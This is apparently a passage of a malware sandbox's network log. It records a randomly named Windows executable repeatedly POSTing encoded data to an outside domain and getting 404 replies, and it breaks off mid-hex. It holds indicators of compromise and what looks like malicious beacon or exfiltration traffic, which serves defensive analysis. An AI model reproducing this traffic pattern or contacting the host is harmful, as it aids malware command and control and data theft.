                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              75192.168.11.2050206198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:33.556193113 CET1174OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 34 45 70 2b 62 66 5a 64 6f 57 58 37 55 4f 55 2b 6b 74 55 4d 4b 34 73 61 49 2f 61 62 65 58 53 79 6c 6b 35 38 49 6a 2b 79 4b 71 47 6f 56 63 71 4b 4e 4b 48 57 76 55 2f 79 34 6f 44 4b 62 4d 75 43 54 43 79 38 76 33 66 37 57 44 36 52 74 77 66 54 33 50 52 57 42 53 4b 46 63 37 39 43 4e 57 4d 5a 67 7a 4d 68 6a 6d 65 35 42 65 41 48 74 63 42 31 33 46 44 56 51 4c 66 52 57 59 66 32 32 6b 72 42 49 6e 67 52 78 52 50 31 67 39 4c 4d 4a 77 30 38 71 64 72 53 59 49 78 46 34 30 76 55 43 44 45 58 6b 74 35 63 34 44 50 2b 67 2f 39 4e 46 66 50 4c 72 37 62 56 4c 4e 4a 7a 53 42 49 6c 4c 6c 48 6a 6b 63 78 65 31 6a 61 45 50 47 66 4d 5a 48 57 35 56 64 72 65 76 4d 51 69 71 50 72 53 77 5a 70 72 2b 6c 4f 37 75 4c 36 78 31 65 47 50 37 71 45 65 53 74 74 70 78 32 71 6f 48 6f 4e 37 6f 72 2b 52 76 51 34 63 4e 61 6f 77 6b 6d 38 68 41 78 58 55 72 62 4d 6e 57 65 58 6d 6d 61 4f 76 4d 73 5a 55 53 38 56 44 61 72 55 50 70 6d 74 6d 39 4d 4e 45 4b 43 4a 4f 42 39 4c 44 6e 36 32 65 35 6e 37 43 30 57 74 48 66 44 33 36 4f 4b 30 6e 42 50 58 41 38 54 67 52 30 69 45 51 64 38 69 52 61 51 4a 76 45 4b 34 57 64 45 43 72 4f 5a 78 6d 6b 73 4a 46 63 43 53 62 6e 78 47 56 4e 50 47 68 59 5a 6d 59 6e 61 47 39 56 63 74 6f 47 2f 68 46 56 51 73 6f 45 41 4a 66 67 38 52 7a 4c 51 71 55 4f 61 32 77 36 2f 37 55 65 72 50 6e 37 6d 37 72 36 79 68 6d 6d 52 64 59 31 64 34 6e 31 74 6b 73 43 42 2b 39 70 4b 76 43 44 49 56 77 50 70 4e 59 4a 42 72 79 48 74 61 68 69 77 7a 6b 69 6d 71 61 7a 4a 6b 64 44 64 39 63 61 50 6d 31 72 4a 32 76 43 31 57 4d 2b 35 41 4c 61 62 39 4a 54 31 57 30 48 53 52 66 6f 33 72 32 55 4e 73 3d
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7UOU+ktUMK4saI/abeXSylk58Ij+yKqGoVcqKNKHWvU/y4oDKbMuCTCy8v3f7WD6RtwfT3PRWBSKFc79CNWMZgzMhjme5BeAHtcB13FDVQLfRWYf22krBIngRxRP1g9LMJw08qdrSYIxF40vUCDEXkt5c4DP+g/9NFfPLr7bVLNJzSBIlLlHjkcxe1jaEPGfMZHW5VdrevMQiqPrSwZpr+lO7uL6x1eGP7qEeSttpx2qoHoN7or+RvQ4cNaowkm8hAxXUrbMnWeXmmaOvMsZUS8VDarUPpmtm9MNEKCJOB9LDn62e5n7C0WtHfD36OK0nBPXA8TgR0iEQd8iRaQJvEK4WdECrOZxmksJFcCSbnxGVNPGhYZmYnaG9VctoG/hFVQsoEAJfg8RzLQqUOa2w6/7UerPn7m7r6yhmmRdY1d4n1tksCB+9pKvCDIVwPpNYJBryHtahiwzkimqazJkdDd9caPm1rJ2vC1WM+5ALab9JT1W0HSRfo3r2UNs=
                                                                                                                              Dec 4, 2023 15:27:33.726489067 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:33 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              76192.168.11.2050207198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:36.242688894 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 34 45 70 2b 62 66 5a 64 6f 57 58 37 55 4f 55 2b 6b 74 55 4d 4b 34 73 61 49 2f 61 62 65 58 53 79 6c 6b 35 38 49 6a 2b 79 4b 71 4f 6f 55 75 69 4b 50 70 66 57 75 55 2f 79 37 6f 44 4c 62 4d 75 6c 54 43 36 6a 76 33 6a 72 57 41 43 52 74 44 6e 54 33 62 78 57 45 53 4b 45 42 4c 39 36 62 6d 4e 65 67 7a 42 69 6a 6d 4b 50 43 75 45 48 73 66 5a 31 7a 33 72 57 65 37 66 54 57 59 66 36 37 45 71 2b 49 6e 56 55 78 52 54 31 67 34 44 4d 4c 43 38 38 6f 4b 66 53 56 34 78 47 33 55 75 61 49 6a 45 79 6b 73 5a 69 34 44 50 75 67 2b 70 4e 46 66 76 4c 71 34 7a 57 49 74 4a 7a 64 52 49 6b 61 31 4c 2f 6b 59 52 47 31 6a 47 45 50 46 66 4d 66 6e 57 35 52 4d 72 66 70 73 52 72 75 50 71 51 36 35 31 7a 2b 6c 71 76 75 4b 75 78 31 4f 43 50 36 5a 73 65 51 50 46 70 79 57 71 75 44 6f 4e 53 68 4c 2b 6b 76 51 70 39 4e 65 59 67 6b 68 45 68 41 54 66 55 68 61 4d 6d 47 75 58 73 37 71 4f 2b 61 63 56 69 53 38 46 66 61 72 56 4b 70 6e 5a 6d 39 38 39 45 4c 44 4a 4a 48 74 4c 45 68 36 33 45 33 48 6e 79 30 58 46 50 66 41 33 71 4f 4a 59 6e 54 2f 58 41 36 30 4d 53 2b 53 45 58 55 63 6a 4f 48 67 4a 30 45 4b 38 67 64 41 79 52 4e 6f 4a 6d 6b 63 5a 46 62 53 53 59 78 42 47 5a 59 2f 47 6a 4a 4a 6d 59 6e 61 61 50 56 63 68 6f 47 4f 70 46 55 69 30 6f 41 54 68 66 74 63 52 70 4c 51 71 2f 4f 62 4c 4f 36 38 62 36 65 71 2f 64 37 67 4c 72 36 47 74 6d 6e 6b 70 58 7a 74 34 69 78 74 6b 33 47 42 43 75 70 4b 7a 61 44 49 6b 4c 50 5a 68 59 49 42 37 79 4d 4e 62 33 6e 51 7a 6a 71 47 71 79 33 4a 5a 43 44 5a 64 71 61 50 69 66 72 4f 71 76 41 78 2f 58 6b 39 55 70 44 4e 64 41 55 68 47 59 49 51 73 54 30 31 54 6d 50 70 6a 31 73 51 63 78 76 2b 33 56 7a 47 42 47 38 42 6f 44 56 50 65 66 5a 4b 32 77 6e 62 52 39 61 6e 56 4a 72 70 65 4b 66 45 53 2b 59 59 34 64 4a 61 46 73 69 74 50 61 2f 49 67 4f 67 63 62 64 68 6f 38 6d 53 6c 74 47 4a 2f 51 31 6b 61 46 64 50 66 58 79 31 75 63 57 71 7a 79 73 76 6b 76 2f 4a 55 51 55 47 55 45 42 65 63 74 6f 36 77 65 55 64 57 70 73 6a 67 34 79 39 65 49 42 65 56 43 6b 46 59 49 51 53 32 36 43 4f 76 34 37 61 75 47 4b 33 71 50 30 4e 37 62 43 2b 41 4c 7a 34 58 38 74 47 53 39 42 6f 2f 43 39 39 70 6e 39 63 37 5a 62 4a 33 6e 6e 57 55 74 7a 71 49 4e 44 52 56 47 33 58 64 75 72 76 66 49 4d 42 79 71 64 66 30 78 4e 63 67 76 39 69 52 2b 51 46 55 70 37 6b 31 58 4d 4e 4b 50 64 66 66 43 6d 6c 45 52 5a 50 4e 51 54 35 67 57 4d 44 58 32 55 64 35 54 59 4a 50 35 70 46 51 2b 6e 71 37 50 67 6d 42 4f 52 51 2b 32 52 66 58 75 54 6f 6e 67 52 61 4a 4a 6f 69 56 70 47 63 35 6a 49 2f 33 67 59 70 39 41 79 5a 78 63 63 39 6a 54 30 46 4c 42 70 61 52 6a 61 63 56 4d 6d 2b 2f 30 67 38 75 6a 76 63 47 6c 73 49 46 63 73 2f 56 6f 7a 39 68 70 6d 4b 35 6f 6b 70 2f 62 71 73 64 65 58 31 7a 71 62 33 64 49 5a 37 46 4d 5a 48 45 4b 6b 33 6d 47 55 33 62 6a 71 35 4c 4f 6a 38 72 30 77 7a 38 31 44 38 2f 4e 76 50 6e 73 51 55 37 35 73 66 73 37 55 56 43 35 56 50 6d 71 4f 53 49 63 56 4c 6f 6c 73 55 51 4a 76 38 54 67 37 55 4d 50 45 39 66 66 6b 52 77 44 38 4d 4b 4a 52 71 6c 44 4a 50 53 57 41 35 39 44 43 42 46 6e 4b 75 38 38 79 34 62 6f 71 6e 41 79 56 41 41 42 41 2b 74 59 50 65 35 78 32 5a 6a 65 68 49 63 64 32 67 4c 45 65 63 4c 30 49 2b 64 64 69 48 6c 72 78 76 77 46 77 55 33 36 71 43 47 50 44 57 51 6c 63 2f 36 48 6c 47 76 39 49 44 6a 66 61 37 6f 37 51 6d 43 78 57 75 6e 4f 6a 36 57 32 33 75 70 48 54 69 78 31 66 4b 71 56 33 58 46 32 4b 72 5a 41 4b 57 78 46 75 31 33 70 69 56 30 63 6d 4c 37 2f 4b 6f 4c 44 33 43 4e 59 59 76 4a 77 68 56 56 48 76 30 54 57 6c 31 59 74 30 63 4a 66 35 51 4f 6a 6d 6f 75 71 47 68 44 34 35 51 6a 63 52 33 73 74 64 71 65 41 38 33 6b 71 31 37 39 58 65 53 6a 43 4b 2b 75 53 41 69 66 4a 50 6e 44 74 6a 44 46 31 7a 74 6e 33 6e 50 56 4e 30 62 43 73 54 43 38 63 47 51 48 76 30 2b 52 4d 6d 70 30 69 78 33 4b 7a 33 76 4d 67 4f 79 4c 63 7a 71 63 49 68 31 72 6a 6c 45 48 64 39 33 2b 41 61 6d 73 44 68 61 34 32 46 4a 55 78 78 58 4f 69 67 32 2b 6c 56 37 30 66 4e 6b 74 70 43 33 7a 63 43 2f 71 58 7a 53 54 73 6e 4c 4c 59 2f 48 55 49 64 45 52 70 6e 61 4a 7a 39 52 64 6b 75 64 62 71 64 31 6b 77 51 58 57 4a 6b 4a 38 75 46 78 50 4e 6b 37 48 55 6d 42 49 70 4b 34 54 32 35 44 47 77 78 54 4d 44 68 5a 30 74 35 71 30 76 46 32 6f 49 2f 7a 69 74
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:27:36.409405947 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:27:36 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 